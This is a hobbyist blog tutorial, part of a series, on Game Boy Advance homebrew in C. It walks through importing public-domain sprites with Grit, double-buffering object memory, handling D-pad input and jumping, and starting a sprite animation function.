GBA By Example - Sprite Animation2017-06-02T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/06/02/GBA-By-Example-5<p>(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p>Whew, it’s been awhile! I know I said I’d put up another tutorial in 2 weeks…but that didn’t happen. Between shipping a game at work, and diving into Vulkan, my interest for GBA stuff definitely took a back seat. Lesson learned, don’t put a deadline on blog posts :)</p>
<p>So far, I’ve gotten by with doing the bare minimum for anything art related, but our end products have never been too exciting. So this article is going to fix that. First, we’re going to walk through the process of grabbing some (public domain) sprites off of <a href="https://opengameart.org/">OpenGameArt.org</a>, importing those into our game, and then using them to animate a character as we move them around the screen.</p>
<p>At the end of the article, we should have something that looks like this:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/hero.gif" style="width:240px;height:160px" />
<br />
</div>
<p>Wooooo! Finally something that kinda looks like a game! Let’s get this train rolling.</p>
<h2 id="getting-our-assets">Getting Our Assets</h2>
<p>All the character sprites we’re working with today come from <a href="https://opengameart.org/content/classic-hero-and-baddies-pack">this asset</a> on OpenGameArt, I chose these sprites not only because they had a sane palette and sprite size (which is hard to find, since not a lot of people are making assets with the GBA’s limitations), but also because they’re public domain, so I can use them in this article without the chance of getting sued. woohoo!</p>
<p>It also means you can use these sprites in your own projects (even commercial projects), which is also pretty cool.</p>
<p>I took the liberty of extracting only the character sprites we’re going to use today into their own spritesheet, which you can grab below:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/charsprites.bmp" />
<br />
</div>
<p>This should save us having to do any pixel editing for this blog post, but we will have to export these sprites into a useable format for our game. To do that, we’re going to use a nifty open source tool called <a href="http://www.coranac.com/projects/grit/">Grit</a>. I mentioned this tool in a previous post, but today I’m going to walk through using it as well. If you don’t have that downloaded already, grab it now and let’s get started.</p>
<h2 id="exporting-sprite-data">Exporting Sprite Data</h2>
<p>Grit is a tool for taking bitmap images, and exporting them into .h/.c files (among other potential types of files), for consumption by a GBA game. We need to export each of our character sprites using it, and then manually load that data in our program like we’ve been doing before.</p>
<p>I’m going to use the GUI version of grit, which you can find in the program folder, titled “wingrit.” There’s a command line app as well, but I haven’t needed to use it yet (and if I can avoid memorizing more command line args, I will), so if you’re following along with me, open wingrit, and you should see the following:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/wingrit.PNG" />
<br />
</div>
<p>Simply open our sprite sheet image (with File->Open), and you should see it in the GUI window. Once you see the image, we need to open the export window, so go to View->GBAExport, and you should see this rather intimidating window pop up:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/exportwindow.PNG" />
<br />
</div>
<p>Like the window itself says, don’t panic :) there’s only a few things we need to do. First, we need to make sure that we’ve set the exported to 8 bits per pixel, you’ll find that option in the top right of the window. Next, tell it to export .h/.c files, so in the “File” section, set the type to “C (*.c),” you’ll also want to set where the exported files should go in the larget text field above the type dropdown. Finally, we need to set the size of our sprite, which, for all of our sprites here, means setting the “Meta/Obj” section to square, size 2, which corresponds to 16x16 pixel sprites.</p>
<p>Finally, I always export the data as unsigned integers. Whenever I use a smaller data type I end up running into weirdness with memcpy at some point. Since we aren’t going to be modifying the raw data anyway, the fact that storing all the data as 32 bit integers makes it harder for humans to read is a non issue. So set your export type to “u32”</p>
<p>Once all that is set up, click ok, and you should see a success popup.</p>
<p>One of the coolest parts about grit is its ability to export multiple sprites from a sprite sheet. Since we told Grit that our sprites were 16x16 pixels in size, it was smart enough to be able to parse the sprite sheet correctly and give us .h/.c files with the data in a nicely useable format. So don’t worry about needing to run grit for each individual sprite, it’s already done all the work for us.</p>
<h2 id="importing-sprite-data">Importing Sprite Data</h2>
<p>Now that we have our sprite data exported, we need to get it into VRAM. This should look familiar if you’ve been following along with previous articles. All we need to do is a few memcpys and we’re good to go:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "charsprites.h"
#include <string.h>
#include "gba.h"
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>One thing that is different this week is that I’ve moved all the memory address defines, and typedefs that we need to use to an include file called gba.h . This is mostly for my sanity, and to keep my code samples cleaner. You can grab this include file <a href="https://github.com/khalladay/GBA-By-Example/blob/master/4-SpriteAnimation/code/gba.h">here</a>. Everything that is in this include has been shown explicitly in a previous post I’ve made, so don’t worry about parsing through it, unless you see something in a code sample that you don’t remember.</p>
<p>Ok, now that we have our data into video memory, we also need to set up our application’s Display Control register so it knows how to interpret it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span></code></pre></figure>
<p>This should look identical to the last time we used sprites, because it is ;) but as a refresher:</p>
<ul>
<li>VIDEOMODE_0 is a tiled video mode, meaning that we’re using sprites instead of drawing directly to the screen buffer</li>
<li>BACKGROUND_0 enables the 0th background. I’m going to use this to colour the background of our game</li>
<li>ENABLE_OBJECTS is the flag that tells our program to use sprites</li>
<li>MAPPINGMODE_1D means that our sprites are stored in a 1 Dimensional array. Grit takes care of this for us.</li>
</ul>
<p>Wonderful! To finish off our setup, let’s add our game loop. Remember that returning from a GBA program’s main function is undefined, so our game loop needs to never terminate. For now, let’s also add a call to our hacky little vsync function in the main loop. This function is defined in gba.h, but is the same as every other post I’ve made.</p>
<p>Put together, our starting point looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "charsprites.h"
#include <string.h>
#include "gba.h"
</span><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Perfect! No we’re ready to get down to the fun stuff!</p>
<h2 id="getting-our-character-on-screen">Getting our Character On Screen</h2>
<p>I always like to work in small, easily verifiable steps when I’m learning something new. So before we dig really far into animating our character, let’s just get our hero on screen. We covered this <a href="http://localhost:4000/blog/tutorial/gba/2017/04/04/GBA-By-Example-2.html">in an earlier post</a>, but today I want to do things a bit differently. Since we’re animating our character today, we should probably talk about double buffering object memory.</p>
<p>Since the GBA hardware draws the screen 1 line at a time, it’s possible to modify the object memory for a sprite while it’s being drawn. In some cases this will just mean a bit of tearing (if the sprite is moving), but in the case of animation, it could lead to the top of the sprite being rendered in a different animation frame from the bottom part. Gross! This isn’t really an issue for us today because we aren’t doing enough work for us to leave the VBLANK pause, but it’s worth noting so that we learn to do things right before from the get go.</p>
<p>In order to avoid this potential problem, one thing we can do is to create a second buffer of memory, which shadows object memory. Whenever we want to update something about a sprite in our game logic, we modify the data inside our own copy of object memory. Then when we hit the VBlank pause, we copy all the data from our shadow buffer to real object memory. This lets us do whatever we want in our logic, while keeping our sprites looking exactly how they should.</p>
<p>We could define our object-memory shadow buffer like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">ObjectAttributes</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span></code></pre></figure>
<p>Remember that the definition of the ObjectAttributes struct is inside gba.h if you forget what that looks like.</p>
<p>Now we should also add the code to copy data from our backbuffer to the real Object Attribute Memory. For now, I’m just going to copy the first element, because that’s all we need for today. In a real application, you’d probably want to copy the whole thing, or at least larger chunks at a time.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>Now that that’s set up, let’s actually copy something useful into VRAM.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span></code></pre></figure>
<p>Which means that, when everything is put together, your main function should look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>With the sprite defined like we have, running the program should yield this:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/firstdraw.png" />
<br />
</div>
<p>Perfect! Now we know our data is in memory correctly! Next let’s get some animations going.</p>
<h2 id="hello-sprite-animation">Hello Sprite Animation</h2>
<p>Before we dig into making our hero run and jump, let’s just get his idle animation cycle running to be sure that things are working how we expect. In the sprite sheet that I provided earlier, the animation cycle is located in the first 4 frames. We want to have our hero cycle through these frames whenever he isn’t moving.</p>
<p>Setting this up a single animation like this is really simple, because all we need to do is point attr2 in our sprite attributes to a new place in tile memory. You’ll notice that right now, our sprite is simply stuck on the first frame of his idle animation. This is because we put the sprites into tile memory at the start of the tile block, so the index of the first frame is 0. It stands to reason that updating this should just be a simple add…</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="p">(</span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">3</span><span class="p">;</span></code></pre></figure>
<p>buuut it isn’t! Remember that attr2 is the index of the tile to use to render the top left most part of your sprite. Since our sprite is 2 tiles by 2 tiles, this means that in theory, to advance a whole frame, our attr2 value must increment by 4. In reality, since we are using 8bpp tiles, we have to double that, so advancing a frame of animation means advancing attr2 by 8. With that in mind, running our idle loop actually requires the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="p">(</span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="mi">32</span><span class="p">;</span></code></pre></figure>
<p>With that bit of code added to the update loop, our protagonist should now be happily bouncing in place:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/dude.gif" />
<br />
</div>
<p>Alright, with that in mind, let’s move on to actually hooking up some input and getting this guy moving around the screen.</p>
<h2 id="setting-up-input">Setting Up Input</h2>
<p>Just like <a href="http://localhost:4000/blog/tutorial/gba/2017/04/18/GBA-By-Example-4.html">last time</a>, all our input handling code is stored in <a href="https://github.com/khalladay/GBA-By-Example/blob/master/4-SpriteAnimation/code/input.h">input.h</a>, so make sure that you add that to your includes. Once that’s included, just make sure to add a call to key_poll in your main function, otherwise we’ll never know when the input state changes. If you’re following along, your main function should look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="p">(</span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="mi">32</span><span class="p">;</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>Before we get to actually writing our movement and animation functions there, there’s one last bit of theory to get out of the way: there are some new bits in the object attributes attr1 variable that we’re going to need today.</p>
<h2 id="more-details-about-object-attributes">More Details About Object Attributes</h2>
<p>When I last talked about sprites, I presented 3 tables describing which bits in the sprite attribute values corresponded to what. In the interest of simplicity, I left out a lot of details. In this post, we need to fill in one of those details, so here is a more complete description of what attribute 1 does:</p>
<div align="center">
<table style="border:1px solid black; width=600px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854">
<tr class="header">
<th>Attr 1</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Sprite Size (discussed below)</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">D</td>
<td>Vertical Flip </td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">C</td>
<td>Horizontal Flip </td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">BA98</td>
<td>Not Used Today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">7654 3210</td>
<td>X coordinate
</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Yes, there’s still some data we don’t need to worry about, but the stuff to pay attention to here are the bit flags for vertical and horizontal flipping. You may have noticed that our sprites only have our protagonist facing one way, the horizontal flip flag is how we’re going to handle the other direction.</p>
<h2 id="moving-our-hero">Moving Our Hero</h2>
<p>Let’s tackle moving our hero around the screen next, and finish off with adding support for the rest of our animation frames. To make things easier (and more readable), I’m going to define a struct to hold all the information we need to move and animate our hero. For simplicity’s sake, I’m just going to make all the fields we need ints.</p>
<p>Here’s what my struct and it’s initialization code look like:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">int</span> <span class="n">FLOOR_Y</span> <span class="o">=</span> <span class="mi">160</span><span class="o">-</span><span class="mi">16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="k">struct</span>
<span class="p">{</span>
<span class="n">ObjectAttributes</span><span class="o">*</span> <span class="n">spriteAttribs</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">facingRight</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">firstAnimCycleFrame</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">animFrame</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">posX</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">posY</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">velX</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">velY</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">framesInAir</span><span class="p">;</span>
<span class="p">}</span><span class="n">HeroSprite</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">InitializeHeroSprite</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">,</span> <span class="n">ObjectAttributes</span><span class="o">*</span> <span class="n">attribs</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="n">attribs</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">=</span> <span class="n">FLOOR_Y</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Nothing too fancy here. Notice though, that I also defined a constant for the location of the “floor” which is actually 16 pixels above the floor. This is because our hero is 16 pixels tall and when you set a sprite’s position, you set it’s top left corner; thus, I’ve defined the floor Y as the location of the top of our hero’s head when he’s on the floor for simplicity.</p>
<p>To handle character movement, I’m going to create another function called updateSpritePosition.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">updateSpritePosition</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">);</span></code></pre></figure>
<p>This function is going to first determine our hero’s velocity for the current frame, and then add those velocities to his position. It will also set up a few other bits of data that we’ll use later when determining what animation frame to display, and actually translate these struct member vars into actual values inside object attribute memory. To start with though, let’s just start dealing with user input from the DPAD:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">int</span> <span class="n">WALK_SPEED</span> <span class="o">=</span> <span class="mi">4</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">updateSpritePosition</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_LEFT</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="o">-</span><span class="n">ANIM_SPEED</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_RIGHT</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="n">ANIM_SPEED</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">+=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velX</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mi">240</span><span class="o">-</span><span class="mi">16</span><span class="p">,</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posX</span><span class="p">);</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posX</span><span class="p">);</span></code></pre></figure>
<p>This should all be pretty straightforward. The only bit you may be wondering about is the facingRight flag. We’re going to use this later to handle horizontally flipping our sprites so that we can use one set of sprites but have our hero be able to look and move both left and right. Also note that I’m clamping the x position to keep our sprite on the screen at all times.</p>
<p>Next, we need to add support for jumping. Note that if we’re already in the air, we don’t want to jump again, so we’re going to have to take that into account:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">updateSpritePosition</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//previous code omitted for brevity</span>
<span class="kt">int</span> <span class="n">isMidAir</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">!=</span> <span class="n">FLOOR_Y</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_A</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">isMidAir</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="n">JUMP_VI</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isMidAir</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="n">JUMP_VI</span> <span class="o">+</span> <span class="p">(</span><span class="n">GRAVITY</span> <span class="o">*</span> <span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span><span class="p">);</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velY</span><span class="p">);</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">+=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velY</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">posY</span><span class="p">,</span> <span class="n">FLOOR_Y</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Hopefully nothing here is surprising. If you haven’t implemented gravity before, you may want to check out <a href="https://www.khanacademy.org/science/physics/one-dimensional-motion/kinematic-formulas/a/what-are-the-kinematic-formulas">this excellent article</a> on Khan Academy about Kinematic equations. Since they’re not the focus of today, that’s all I’m going to say about them here. I’m using the framesInAir variable in place of an actual time calculation for now, which is why it reset whenever a new jump starts.</p>
<p>None of this code actually moves our sprite, so we need to finish off this function by setting a few key variables:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2000</span> <span class="o">+</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posY</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span><span class="o">?</span> <span class="mh">0x4000</span> <span class="o">:</span> <span class="mh">0x5000</span><span class="p">)</span> <span class="o">+</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posX</span><span class="p">;</span></code></pre></figure>
<p>As you can see, because the lowest bits in these flags store positions, it’s enough for us to just add our x and y position to the end of them. You can also see how the facingRight flag corresponds to the value we set in the horizontal flip bit that we talked about earlier.</p>
<p>Now we need to add a call to this function to main:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="n">HeroSprite</span> <span class="n">sprite</span><span class="p">;</span>
<span class="n">InitializeHeroSprite</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">,</span> <span class="o">&</span><span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">updateSpritePosition</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">);</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And with that, you should be able to move your sprite around using the dpad and A button to jump. He just won’t be animating yet:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/movingnoanim.gif" style="width:240px;height:160px" />
<br />
</div>
<h2 id="our-animation-function">Our Animation function</h2>
<p>As the heading suggests, we’re going to be writing one more function today, which is going to implement our animation:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">tickSpriteAnimation</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">);</span></code></pre></figure>
<p>We’re going to be choosing the tile to point our attr2 variable at by setting two separate values, the firstAnimCycleFrame and animFrame values in our HeroSprite struct:</p>
<ul>
<li><em>firstAnimCycleFrame</em> will hold the index to the first frame in that animation cycle. Our idle animation cycle is 4 frames long and starts at index 0, so for the idle animation cycle, this will be set to 0</li>
<li><em>animFrame</em> will hold the current frame of animation we are at in our animation cycle. If we want the third frame of an animation, this would be set to two (since frames are zero indexed)</li>
</ul>
